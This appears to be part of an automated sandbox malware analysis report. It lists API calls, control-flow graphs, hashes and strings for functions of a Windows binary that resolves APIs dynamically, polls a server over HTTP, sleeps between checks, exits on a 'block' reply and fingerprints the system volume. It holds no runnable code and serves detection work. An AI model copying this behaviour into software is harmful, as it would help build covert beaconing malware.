                                      • LoadLibraryA.KERNEL32(00F1D038,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A072
                                      • LoadLibraryA.KERNEL32(00F1D0B0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A083
                                      • LoadLibraryA.KERNEL32(00F1D0C8,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A095
                                      • LoadLibraryA.KERNEL32(00F1D0E0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A0A7
                                      • LoadLibraryA.KERNEL32(00F1CE10,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A0B8
                                      • GetProcAddress.KERNEL32(75290000,00F05790), ref: 0053A0DA
                                      • GetProcAddress.KERNEL32(75290000,00F1D140), ref: 0053A0F2
                                      • GetProcAddress.KERNEL32(75290000,00F198A0), ref: 0053A10A
                                      • GetProcAddress.KERNEL32(75290000,00F1D218), ref: 0053A123
                                      • GetProcAddress.KERNEL32(75290000,00F058F0), ref: 0053A13B
                                      • GetProcAddress.KERNEL32(6FCD0000,00F0B9A0), ref: 0053A160
                                      • GetProcAddress.KERNEL32(6FCD0000,00F056B0), ref: 0053A179
                                      • GetProcAddress.KERNEL32(6FCD0000,00F0B9C8), ref: 0053A191
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D3B0), ref: 0053A1A9
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D1D0), ref: 0053A1C2
                                      • GetProcAddress.KERNEL32(6FCD0000,00F057D0), ref: 0053A1DA
                                      • GetProcAddress.KERNEL32(6FCD0000,00F05910), ref: 0053A1F2
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D380), ref: 0053A20B
                                      • GetProcAddress.KERNEL32(752C0000,00F05A90), ref: 0053A22C
                                      • GetProcAddress.KERNEL32(752C0000,00F05990), ref: 0053A244
                                      • GetProcAddress.KERNEL32(752C0000,00F1D350), ref: 0053A25D
                                      • GetProcAddress.KERNEL32(752C0000,00F1D398), ref: 0053A275
                                      • GetProcAddress.KERNEL32(752C0000,00F05A10), ref: 0053A28D
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B6D0), ref: 0053A2B3
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B658), ref: 0053A2CB
                                      • GetProcAddress.KERNEL32(74EC0000,00F1D1E8), ref: 0053A2E3
                                      • GetProcAddress.KERNEL32(74EC0000,00F058B0), ref: 0053A2FC
                                      • GetProcAddress.KERNEL32(74EC0000,00F05A30), ref: 0053A314
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B900), ref: 0053A32C
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D3C8), ref: 0053A352
                                      • GetProcAddress.KERNEL32(75BD0000,00F05930), ref: 0053A36A
                                      • GetProcAddress.KERNEL32(75BD0000,00F19740), ref: 0053A382
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D128), ref: 0053A39B
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D290), ref: 0053A3B3
                                      • GetProcAddress.KERNEL32(75BD0000,00F05850), ref: 0053A3CB
                                      • GetProcAddress.KERNEL32(75BD0000,00F056D0), ref: 0053A3E4
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D2D8), ref: 0053A3FC
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D2C0), ref: 0053A414
                                      • GetProcAddress.KERNEL32(75A70000,00F05950), ref: 0053A436
                                      • GetProcAddress.KERNEL32(75A70000,00F1D248), ref: 0053A44E
                                      • GetProcAddress.KERNEL32(75A70000,00F1D368), ref: 0053A466
                                      • GetProcAddress.KERNEL32(75A70000,00F1D2F0), ref: 0053A47F
                                      • GetProcAddress.KERNEL32(75A70000,00F1D308), ref: 0053A497
                                      • GetProcAddress.KERNEL32(75450000,00F056F0), ref: 0053A4B8
                                      • GetProcAddress.KERNEL32(75450000,00F05970), ref: 0053A4D1
                                      • GetProcAddress.KERNEL32(75DA0000,00F05A50), ref: 0053A4F2
                                      • GetProcAddress.KERNEL32(75DA0000,00F1D230), ref: 0053A50A
                                      • GetProcAddress.KERNEL32(6F070000,00F057F0), ref: 0053A530
                                      • GetProcAddress.KERNEL32(6F070000,00F059B0), ref: 0053A548
                                      • GetProcAddress.KERNEL32(6F070000,00F05710), ref: 0053A560
                                      • GetProcAddress.KERNEL32(6F070000,00F1D3E0), ref: 0053A579
                                      • GetProcAddress.KERNEL32(6F070000,00F059D0), ref: 0053A591
                                      • GetProcAddress.KERNEL32(6F070000,00F05A70), ref: 0053A5A9
                                      • GetProcAddress.KERNEL32(6F070000,00F05730), ref: 0053A5C2
                                      • GetProcAddress.KERNEL32(6F070000,00F05750), ref: 0053A5DA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0053A5F1
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0053A607
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D110), ref: 0053A629
                                      • GetProcAddress.KERNEL32(75AF0000,00F197F0), ref: 0053A641
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D278), ref: 0053A659
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D200), ref: 0053A672
                                      • GetProcAddress.KERNEL32(75D90000,00F05770), ref: 0053A693
                                      • GetProcAddress.KERNEL32(6E330000,00F1D320), ref: 0053A6B4
                                      • GetProcAddress.KERNEL32(6E330000,00F057B0), ref: 0053A6CD
                                      • GetProcAddress.KERNEL32(6E330000,00F1D260), ref: 0053A6E5
                                      • GetProcAddress.KERNEL32(6E330000,00F1D0F8), ref: 0053A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 05989f181c13ac5d09fe7787094cdbf8cd8fc862906e239fe60c99656e42744d
                                      • Instruction ID: bddfe914992b46d8041d0cc782aef9579598f1ef6333ec53b7bf36772ee2d210
                                      • Opcode Fuzzy Hash: 05989f181c13ac5d09fe7787094cdbf8cd8fc862906e239fe60c99656e42744d
                                      • Instruction Fuzzy Hash: 74623AB5500341BFC745DFA8EE889563BF9F79C201714C51AE60BE3224DABDA841DF2A
                                      Function 00526280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 526280-52630b call 53a7a0 call 5247b0 call 53a740 InternetOpenA StrCmpCA 1040 526314-526318 1033->1040 1041 52630d 1033->1041 1042 526509-526525 call 53a7a0 call 53a800 * 2 1040->1042 1043 52631e-526342 InternetConnectA 1040->1043 1041->1040 1062 526528-52652d 1042->1062 1045 526348-52634c 1043->1045 1046 5264ff-526503 InternetCloseHandle 1043->1046 1048 52635a 1045->1048 1049 52634e-526358 1045->1049 1046->1042 1051 526364-526392 HttpOpenRequestA 1048->1051 1049->1051 1053 5264f5-5264f9 InternetCloseHandle 1051->1053 1054 526398-52639c 1051->1054 1053->1046 1056 5263c5-526405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 52639e-5263bf InternetSetOptionA 1054->1057 1058 526407-526427 call 53a740 call 53a800 * 2 1056->1058 1059 52642c-52644b call 538940 1056->1059 1057->1056 1058->1062 1067 5264c9-5264e9 call 53a740 call 53a800 * 2 1059->1067 1068 52644d-526454 1059->1068 1067->1062 1071 526456-526480 InternetReadFile 1068->1071 1072 5264c7-5264ef InternetCloseHandle 1068->1072 1076 526482-526489 1071->1076 1077 52648b 1071->1077 1072->1053 1076->1077 1080 52648d-5264c5 call 53a9b0 call 53a8a0 call 53a800 1076->1080 1077->1072 1080->1071
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005263FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0052646D
                                      • InternetCloseHandle.WININET(00000000), ref: 005264EF
                                      • InternetCloseHandle.WININET(00000000), ref: 005264F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00526503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: a8a4e5bbd8ababc98683a0491871f1afd5c50df5cb7f88ea4eddcd47e9892ff5
                                      • Instruction ID: c6dd74edfe3cbf79207b828c5ef48bf1b18918aaa11e7c6cbc60b41f8d2cafad
                                      • Opcode Fuzzy Hash: a8a4e5bbd8ababc98683a0491871f1afd5c50df5cb7f88ea4eddcd47e9892ff5
                                      • Instruction Fuzzy Hash: A8712C71A00318ABDF14EBA0DC99BEEBB74BF45700F108598F50A6B1D4DBB46A85CF91
                                      Function 00535510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 535510-535577 call 535ad0 call 53a820 * 3 call 53a740 * 4 1106 53557c-535583 1090->1106 1107 5355d7-53564c call 53a740 * 2 call 521590 call 5352c0 call 53a8a0 call 53a800 call 53aad0 StrCmpCA 1106->1107 1108 535585-5355b6 call 53a820 call 53a7a0 call 521590 call 5351f0 1106->1108 1134 535693-5356a9 call 53aad0 StrCmpCA 1107->1134 1138 53564e-53568e call 53a7a0 call 521590 call 5351f0 call 53a8a0 call 53a800 1107->1138 1124 5355bb-5355d2 call 53a8a0 call 53a800 1108->1124 1124->1134 1139 5356af-5356b6 1134->1139 1140 5357dc-535844 call 53a8a0 call 53a820 * 2 call 521670 call 53a800 * 4 call 536560 call 521550 1134->1140 1138->1134 1143 5357da-53585f call 53aad0 StrCmpCA 1139->1143 1144 5356bc-5356c3 1139->1144 1270 535ac3-535ac6 1140->1270 1163 535991-5359f9 call 53a8a0 call 53a820 * 2 call 521670 call 53a800 * 4 call 536560 call 521550 1143->1163 1164 535865-53586c 1143->1164 1148 5356c5-535719 call 53a820 call 53a7a0 call 521590 call 5351f0 call 53a8a0 call 53a800 1144->1148 1149 53571e-535793 call 53a740 * 2 call 521590 call 5352c0 call 53a8a0 call 53a800 call 53aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 535795-5357d5 call 53a7a0 call 521590 call 5351f0 call 53a8a0 call 53a800 1149->1249 1163->1270 1170 535872-535879 1164->1170 1171 53598f-535a14 call 53aad0 StrCmpCA 1164->1171 1178 5358d3-535948 call 53a740 * 2 call 521590 call 5352c0 call 53a8a0 call 53a800 call 53aad0 StrCmpCA 1170->1178 1179 53587b-5358ce call 53a820 call 53a7a0 call 521590 call 5351f0 call 53a8a0 call 53a800 1170->1179 1199 535a16-535a21 Sleep 1171->1199 1200 535a28-535a91 call 53a8a0 call 53a820 * 2 call 521670 call 53a800 * 4 call 536560 call 521550 1171->1200 1178->1171 1275 53594a-53598a call 53a7a0 call 521590 call 5351f0 call 53a8a0 call 53a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                                      APIs
                                        • Part of subcall function 0053A820: lstrlen.KERNEL32(00524F05,?,?,00524F05,00540DDE), ref: 0053A82B
                                        • Part of subcall function 0053A820: lstrcpy.KERNEL32(00540DDE,00000000), ref: 0053A885
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005356A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535857
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535228
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 005352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535318
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 0053532F
                                        • Part of subcall function 005352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00535364
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 00535383
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 005353AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0053578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00535A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 5f5330b22730a744f521bf77d459a689d3556efa216af8a3b07f7e278f1b4855
                                      • Instruction ID: 046e0785843272eb79e35932a3d9fc635d9e5c7365fac4fb5b5e684d51c47de7
                                      • Opcode Fuzzy Hash: 5f5330b22730a744f521bf77d459a689d3556efa216af8a3b07f7e278f1b4855
                                      • Instruction Fuzzy Hash: AEE14472910205AACB14FBB0DC9AEEDBB78BF94300F508528F54766095FF746A09CF96
                                      Function 005317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 5317a0-5317cd call 53aad0 StrCmpCA 1304 5317d7-5317f1 call 53aad0 1301->1304 1305 5317cf-5317d1 ExitProcess 1301->1305 1309 5317f4-5317f8 1304->1309 1310 5319c2-5319cd call 53a800 1309->1310 1311 5317fe-531811 1309->1311 1312 531817-53181a 1311->1312 1313 53199e-5319bd 1311->1313 1315 531913-531924 StrCmpCA 1312->1315 1316 531932-531943 StrCmpCA 1312->1316 1317 5318f1-531902 StrCmpCA 1312->1317 1318 531951-531962 StrCmpCA 1312->1318 1319 531970-531981 StrCmpCA 1312->1319 1320 531835-531844 call 53a820 1312->1320 1321 53187f-531890 StrCmpCA 1312->1321 1322 53185d-53186e StrCmpCA 1312->1322 1323 531821-531830 call 53a820 1312->1323 1324 531849-531858 call 53a820 1312->1324 1325 5318cf-5318e0 StrCmpCA 1312->1325 1326 53198f-531999 call 53a820 1312->1326 1327 5318ad-5318be StrCmpCA 1312->1327 1313->1309 1335 531930 1315->1335 1336 531926-531929 1315->1336 1337 531945-531948 1316->1337 1338 53194f 1316->1338 1333 531904-531907 1317->1333 1334 53190e 1317->1334 1339 531964-531967 1318->1339 1340 53196e 1318->1340 1342 531983-531986 1319->1342 1343 53198d 1319->1343 1320->1313 1350 531892-53189c 1321->1350 1351 53189e-5318a1 1321->1351 1348 531870-531873 1322->1348 1349 53187a 1322->1349 1323->1313 1324->1313 1331 5318e2-5318e5 1325->1331 1332 5318ec 1325->1332 1326->1313 1329 5318c0-5318c3 1327->1329 1330 5318ca 1327->1330 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1313 1336->1335 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 5318a8 1350->1352 1351->1352 1352->1313
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 005317C5
                                      • ExitProcess.KERNEL32 ref: 005317D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 8395a02414958a94c74778c1535f9af45201e4d243e10fa79ca97cf9b3981fce
                                      • Instruction ID: 019a317c1681fad2e3794a1c5e13aa9f013c3f1efc0915154f84db39bd1dc5d2
                                      • Opcode Fuzzy Hash: 8395a02414958a94c74778c1535f9af45201e4d243e10fa79ca97cf9b3981fce
                                      • Instruction Fuzzy Hash: AA5178B5A0420AEFCB04DFA4D958FBE7BB5BF44304F108448E806AB280D774E955CB6A
                                      Function 00537500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 537500-53754a GetWindowsDirectoryA 1357 537553-5375c7 GetVolumeInformationA call 538d00 * 3 1356->1357 1358 53754c 1356->1358 1365 5375d8-5375df 1357->1365 1358->1357 1366 5375e1-5375fa call 538d00 1365->1366 1367 5375fc-537617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 537619-537626 call 53a740 1367->1369 1370 537628-537658 wsprintfA call 53a740 1367->1370 1377 53767e-53768e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00537542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0053757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00537603
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0053760A
                                      • wsprintfA.USER32 ref: 00537640
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$T
                                      • API String ID: 1544550907-4263779954
                                      • Opcode ID: a1725f09d0e15450bab67453e246fce0abf79b933d596b82f37bea402dd4a69e
                                      • Instruction ID: 11c3dc0d0469a87398f81c829cb48bbbe764004bc555cdb179d749079ae5d0d0
                                      • Opcode Fuzzy Hash: a1725f09d0e15450bab67453e246fce0abf79b933d596b82f37bea402dd4a69e
                                      • Instruction Fuzzy Hash: BB4171B1D04348ABDB14DB94DC55BEEBBB8BB48700F104599F50967280D7786A44CFA5
                                      Function 005369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12BA0), ref: 005398A1
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CA8), ref: 005398BA
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CC0), ref: 005398D2
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12B10), ref: 005398EA
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12C60), ref: 00539903
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F19780), ref: 0053991B
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05C70), ref: 00539933
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05CB0), ref: 0053994C
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12A80), ref: 00539964
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12A98), ref: 0053997C
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12AE0), ref: 00539995
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12CD8), ref: 005399AD
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F05CF0), ref: 005399C5
                                        • Part of subcall function 00539860: GetProcAddress.KERNEL32(74DD0000,00F12C78), ref: 005399DE
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 005211D0: ExitProcess.KERNEL32 ref: 00521211
